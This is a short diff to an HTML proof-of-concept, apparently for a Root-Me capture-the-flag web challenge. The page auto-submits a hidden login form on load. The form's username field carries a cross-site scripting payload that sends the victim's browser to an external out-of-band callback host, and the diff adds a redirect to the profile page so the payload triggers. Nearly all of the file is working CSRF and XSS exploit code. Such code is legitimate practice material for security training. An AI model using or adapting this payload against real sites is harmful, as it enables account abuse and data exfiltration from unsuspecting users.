--- a/poc2.html
+++ b/poc2.html
@@ -1,6 +1,6 @@
 <!DOCTYPE html>
 <html>
-  <body onload="document.forms[0].submit()">
+	<body onload="document.forms[0].submit(); document.location='http://challenge01.root-me.org:58003/profile'">
     <form action="http://challenge01.root-me.org:58003/login" method="POST">
 		<input type="hidden" name="username" value="<script>document.location = 'https://jrnhteacxragwsxmgdxlwnh0wn3hp1vx0.oast.fun/ADMINPROFILEXSS=true';</script>">
     </form>
